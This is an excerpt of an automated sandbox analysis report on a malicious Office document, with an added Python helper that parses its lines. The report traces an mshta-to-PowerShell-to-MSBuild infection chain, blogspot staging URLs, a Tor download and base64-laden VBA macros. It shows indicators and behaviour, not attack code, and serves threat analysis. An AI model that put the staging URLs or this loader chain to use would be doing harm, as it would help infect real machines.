              Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=em
              Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=fa
              Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=pi
              Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=tw
              Source: mshta.exe, 00000006.00000003.2253117052.0000000002DF1000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2262558923.000000000012E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242550287.00000000075DE000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/static/v1/jsbin/2036001057-lbx__en_gb.js
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250247675.000000000044A000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js
              Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js.blogspot.com%2Fp%2Fst2222.
              Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsC:
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsT
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsn
              Source: mshta.exe, 00000006.00000003.2250247675.000000000044A000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3767
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250960830.0000000003B3F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/static/v1/jsbin/376796862-ieretrofit.js
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/static/v1/jsbin/376796862-ieretrofit.js.cssmV
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.js
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp | String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.js06G
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp | String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.jsET4.0C;
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css
              Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssG
              Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssjigi123.blogspot.com%2Fp%2Fst2222.
              Source: mshta.exe, 00000006.00000003.2253117052.0000000002DF1000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2262558923.000000000012E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242550287.00000000075DE000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/static/v1/v-css/368954415-lightbox_bundle.css
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000002.2276548700.0000000003B43000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.css
              Source: mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.cssEV
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.cssQV
              Source: mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.csscV
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221581590.0000000003B5D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/static/v1/widgets/84067855-widgets.js
              Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/static/v1/widgets/84067855-widgets.jsY
              Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/static/v1/widgets/84067855-widgets.jseflate
              Source: mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246295022.0000000005886000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/unvisited-link-
              Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp | String found in binary or memory: https://www.google-analytics.com/
              Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmp | String found in binary or memory: https://www.google-analytics.com/analytics.js
              Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp | String found in binary or memory: https://www.google-analytics.com/analytics.jsZ
              Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp | String found in binary or memory: https://www.google-analytics.com/analytics.jsal
              Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmp | String found in binary or memory: https://www.google-analytics.com/analytics.jsttps%3A%2F%2Fmainjigijigi123.blogspot.com%2Fp%2Fst2222.
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp | String found in binary or memory: https://www.google-analytics.com/s
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com
              Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/
              Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/CO
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/css/maia.css
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/css/maia.cssM
              Source: mshta.exe, 00000006.00000002.2309877256.00000000080A2000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/css/maia.cssg
              Source: mshta.exe, 00000006.00000002.2268752181.00000000003DE000.00000004.00000020.sdmp | String found in binary or memory: https://www.google.com/css/maia.cssgspotURL=https%3A%2F%2Fmainjigijigi123.blogspot.com%2Fp%2Fst2222.
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp | String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
              Source: mshta.exe, 00000006.00000003.2264675792.000000000585E000.00000004.00000001.sdmp | String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_dark_clr_74x24px.svg
              Source: mshta.exe, 00000006.00000003.2264675792.000000000585E000.00000004.00000001.sdmp | String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svg
              Source: mshta.exe, 00000006.00000003.2264365340.0000000005775000.00000004.00000001.sdmp | String found in binary or memory: https://www.gstatic.com/images/icons/gplus-32.png
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp | String found in binary or memory: https://www.gstatic.com/images/icons/gplus-32.png)
              Source: mshta.exe, 00000006.00000003.2261840668.00000000075DE000.00000004.00000001.sdmp | String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/search_black_24dp.png
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp | String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.TCoB7ee77HA.O/rt=j/m=q_d
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp | String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.1KF06_f2niE.L.X.O/m=qawd
              Source: powershell.exe, 0000000C.00000002.2279587829.00000000046AE000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp | String found in binary or memory: https://www.youtube.com
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49204
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49200
              Source: unknown | Network traffic detected: HTTP traffic on port 49183 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49188
              Source: unknown | Network traffic detected: HTTP traffic on port 49181 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49184
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49183
              Source: unknown | Network traffic detected: HTTP traffic on port 49200 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49181
              Source: unknown | Network traffic detected: HTTP traffic on port 49204 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49206 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49195 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49193 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49176 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49174 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49178 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49210 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49184 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49215
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49213
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49178
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49210
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49176
              Source: unknown | Network traffic detected: HTTP traffic on port 49190 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49174
              Source: unknown | Network traffic detected: HTTP traffic on port 49188 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49195
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49193
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49192
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49190
              Source: unknown | Network traffic detected: HTTP traffic on port 49208 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49192 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49213 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49208
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49206
              Source: unknown | Network traffic detected: HTTP traffic on port 49215 -> 443
              Source: unknown | HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49168 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49178 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49188 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49192 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49200 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49208 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49213 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49215 version: TLS 1.2
              Source: C:\Windows\System32\mshta.exe | Window created: window name: CLIPBRDWNDCLASS
              Source: C:\Windows\System32\mshta.exe | Window created: window name: CLIPBRDWNDCLASS
              Source: C:\Windows\System32\mshta.exe | Window created: window name: CLIPBRDWNDCLASS
              Source: C:\Windows\System32\mshta.exe | Window created: window name: CLIPBRDWNDCLASS
              Source: C:\Windows\System32\mshta.exe | Window created: window name: CLIPBRDWNDCLASS
              Source: C:\Windows\System32\mshta.exe | Window created: window name: CLIPBRDWNDCLASS
              Source: C:\Windows\System32\mshta.exe | Window created: window name: CLIPBRDWNDCLASS
              Source: C:\Windows\System32\mshta.exe | Window created: window name: CLIPBRDWNDCLASS
              Source: C:\Windows\System32\mshta.exe | Window created: window name: CLIPBRDWNDCLASS
              Source: C:\Windows\System32\mshta.exe | Window created: window name: CLIPBRDWNDCLASS
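              The memory-string and flow lines above are what an analyst pivots on, but as exported they are awkward: the Source and description columns run together, URLs carved from process memory carry trailing junk bytes (the `.pnga`, `.jsET4.0C;`, `.html$` variants), the real staging page (`mainjigijigi123.blogspot.com/p/st2222.html`) only appears inside a `blogger.com/blogin.g?blogspotURL=` redirect parameter, and the port-only "HTTP traffic on port" lines have to be joined with the "HTTPS traffic detected" lines to learn which server a port actually spoke to. The following is an added example written for this page; it is not part of the report and is not Joe Sandbox code. It parses a handful of lines taken from this section (constructed sample, accepted in both the fused and the column-separated form), and it makes two labelled assumptions: that the first dotted field of a `.sdmp` name is the process id in hex (consistent with `00000006` for mshta.exe and `0000000C` for powershell.exe here), and that a URL differing from a same-prefix URL with a known file extension by at most eight trailing bytes is a carve artifact rather than a distinct URL.

```python
"""Pivot helpers for the memory-string and network lines of a sandbox report.

Added example, not part of the original report or of the sandbox product.
"""
import re
from urllib.parse import unquote, urlsplit

# Constructed sample: lines taken from this report section (Source column and
# description column; the export sometimes runs them together, sometimes not).
SAMPLE_LINES = [
    "Source: mshta.exe, 00000006.00000003.2251143360.00000000058E6000.00000004.00000001.sdmp, "
    "mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmp"
    "String found in binary or memory: https://startthepartyup.blogspot.com/p/backbone14.html",
    "Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp | "
    "String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.html$",
    "Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp"
    "String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://mainjigijigi123.blogspot.com/p/st2222.html%26",
    "Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp"
    "String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.png",
    "Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp"
    "String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pnga",
    "Source: powershell.exe, 0000000C.00000002.2279587829.00000000046AE000.00000004.00000001.sdmp"
    "String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip",
    "Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443",
    "Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168",
    "Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443",
    "Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49168 version: TLS 1.2",
]

STRING_RE = re.compile(r"^Source:\s*(?P<src>.+?\.sdmp)\s*\|?\s*String found in binary or memory:\s*(?P<url>\S+)\s*$")
DUMP_RE = re.compile(r"([^,\s]+),\s*([0-9A-Fa-f]+(?:\.[0-9A-Fa-f]+)+\.sdmp)")
FLOW_RE = re.compile(r"HTTP traffic on port (\d+) -> (\d+)")
TLS_RE = re.compile(r"HTTPS traffic detected: (?P<server>[\d.]+):\d+ -> [\d.]+:(?P<cport>\d+) version: (?P<ver>[\w. ]+?)\s*$")
BLOGIN_RE = re.compile(r"blogspotURL(?:=|%3D)(?P<target>.+?)(?:&|%26|$)")
KNOWN_EXT = (".js", ".css", ".png", ".gif", ".svg", ".html", ".zip")
MAX_JUNK = 8  # assumption: at most this many carve-artifact bytes trail a real URL


def memory_strings(lines):
    """Return [(process, pid, url)], one entry per memory dump a URL was carved from."""
    out = []
    for line in lines:
        m = STRING_RE.match(line)
        if not m:
            continue
        for proc, dump in DUMP_RE.findall(m.group("src")):
            pid = int(dump.split(".")[0], 16)  # assumption: first dotted field is the PID in hex
            out.append((proc, pid, m.group("url")))
    return out


def collapse_carve_artifacts(urls):
    """Map each URL to its canonical form. A URL that extends another URL ending in a
    known file extension by a few bytes is treated as that URL plus memory junk."""
    uniq = sorted(set(urls), key=len)
    canon = {}
    for u in uniq:
        canon[u] = u
        for v in uniq:
            if v != u and u.startswith(v) and v.endswith(KNOWN_EXT) and len(u) - len(v) <= MAX_JUNK:
                canon[u] = v
                break
    return canon


def urls_by_process(lines):
    """{process: sorted canonical URLs}, artifacts collapsed across the whole set."""
    recs = memory_strings(lines)
    canon = collapse_carve_artifacts([u for _, _, u in recs])
    by = {}
    for proc, _pid, u in recs:
        by.setdefault(proc, set()).add(canon[u])
    return {p: sorted(s) for p, s in by.items()}


def staging_pages(urls):
    """Blogspot pages referenced directly or hidden inside blogger.com login redirects."""
    pages = set()
    for u in urls:
        if (urlsplit(u).hostname or "").endswith(".blogspot.com"):
            pages.add(u)
        m = BLOGIN_RE.search(u)
        if m:
            pages.add(unquote(m.group("target")))  # redirect target may be %-encoded
    canon = collapse_carve_artifacts(pages)
    return sorted(set(canon.values()))


def tls_flows(lines):
    """{client_port: (server_ip, tls_version) or None}. Ports that only appear in the
    port-only lines stay None: the report never tells us which server they reached."""
    flows = {}
    for line in lines:
        m = FLOW_RE.search(line)
        if m:
            a, b = int(m.group(1)), int(m.group(2))
            flows.setdefault(b if a == 443 else a, None)
    for line in lines:
        m = TLS_RE.search(line)
        if m:
            flows[int(m.group("cport"))] = (m.group("server"), m.group("ver"))
    return flows


if __name__ == "__main__":
    recs = memory_strings(SAMPLE_LINES)
    print("processes:", sorted({(p, pid) for p, pid, _ in recs}))
    print("staging pages:", staging_pages([u for _, _, u in recs]))
    for proc, urls in urls_by_process(SAMPLE_LINES).items():
        print(proc, "->", len(urls), "URLs")
    print("flows:", tls_flows(SAMPLE_LINES))
```

The artifact collapse is deliberately narrow: it only folds a string into a shorter one that is already present and already ends in a recognisable extension, so a genuinely different URL such as `https://www.blogger.com/?tab=jj` next to `https://www.blogger.com/` is left alone, while the `.pnga`/`.pngx` variants fold into `share_buttons_20_3.png`. Everything that does not fold is still reported, which is the right default when reading carved memory: a string you cannot explain is a lead, not noise.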

              System Summary:

              .NET source code contains very large array initializations
              Source: 29.2.MSBuild.exe.400000.2.unpack, <PrivateImplementationDetails>{E0F986DB-41FA-48F8-8F63-63B8796C3D6F}/0691DBC7-6A15-4BCC-B997-853341EE6FA4.cs | Large array initialization: .cctor: array initializer size 12059
              Document contains an embedded VBA with base64 encoded strings
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function nQedtxArQgZ, String zEROxKkkLThIdHgxYyJD
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function PvrrqugmtK, String zEROxKkkLThIdHgxYyJD
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function aaBJQySxVnzo, String zEROxKkkLThIdHgxYyJD
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function QAPwCVeTzuvty, String zEROxKkkLThIdHgxYyJD
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function QAPwCVeTzuvty, String MyORUMlOteZN
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function hHvsmECZuS, String zEROxKkkLThIdHgxYyJD
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function hHvsmECZuS, String MyORUMlOteZN
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function hHvsmECZuS, String SoqzJEixPkDxnScc
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function SADYAESdyLyl, String zEROxKkkLThIdHgxYyJD
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function SADYAESdyLyl, String MyORUMlOteZN
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function SADYAESdyLyl, String SoqzJEixPkDxnScc
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function SADYAESdyLyl, String umiuKavjsPKoqQrwEtZi
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function CHflsQkjzDFxQmeO, String zEROxKkkLThIdHgxYyJD
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function CHflsQkjzDFxQmeO, String MyORUMlOteZN
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function CHflsQkjzDFxQmeO, String SoqzJEixPkDxnScc
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function CHflsQkjzDFxQmeO, String umiuKavjsPKoqQrwEtZi
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function YqawgrxtEVk, String zEROxKkkLThIdHgxYyJD
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function YqawgrxtEVk, String MyORUMlOteZN
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function YqawgrxtEVk, String SoqzJEixPkDxnScc
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function YqawgrxtEVk, String umiuKavjsPKoqQrwEtZi
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function GhgwmphFjNLti, String zEROxKkkLThIdHgxYyJD
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function GhgwmphFjNLti, String MyORUMlOteZN
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function GhgwmphFjNLti, String SoqzJEixPkDxnScc
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function GhgwmphFjNLti, String umiuKavjsPKoqQrwEtZi
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function AKQMZpqLNQucEUBHbjY, String zEROxKkkLThIdHgxYyJD
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function AKQMZpqLNQucEUBHbjY, String MyORUMlOteZN
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function AKQMZpqLNQucEUBHbjY, String SoqzJEixPkDxnScc
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function AKQMZpqLNQucEUBHbjY, String umiuKavjsPKoqQrwEtZi
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function kVazolfxuRnLRNadrMO, String zEROxKkkLThIdHgxYyJD
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function kVazolfxuRnLRNadrMO, String MyORUMlOteZN
              Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function kVazolfxuRnLRNadrMO, String SoqzJEixPkDxnScc
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function kVazolfxuRnLRNadrMO, String umiuKavjsPKoqQrwEtZi
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function piRACQzERc, String zEROxKkkLThIdHgxYyJD
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function piRACQzERc, String MyORUMlOteZN
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function piRACQzERc, String SoqzJEixPkDxnScc
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function piRACQzERc, String umiuKavjsPKoqQrwEtZi
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function decrypt, String yqPfQprLotGR
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function decrypt, String yqPfQprLotGR
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function decrypt, String yqPfQprLotGR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 76E20000 page execute and read and write
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 76D20000 page execute and read and write
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_003FB2EE NtQuerySystemInformation,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_003FB2CC NtQuerySystemInformation,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_01D9B2EE NtQuerySystemInformation,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_01D9B2CC NtQuerySystemInformation,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CEB2EE NtQuerySystemInformation,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CEB2CC NtQuerySystemInformation,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_02A518A8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_02A574B7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_02A51897
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_02A574C8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_02A5618D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_02A51538
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_02A51548
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_02871897
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_028718A8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_028774B7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_028774C8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_02871538
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_02871548
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 29_2_001E6020
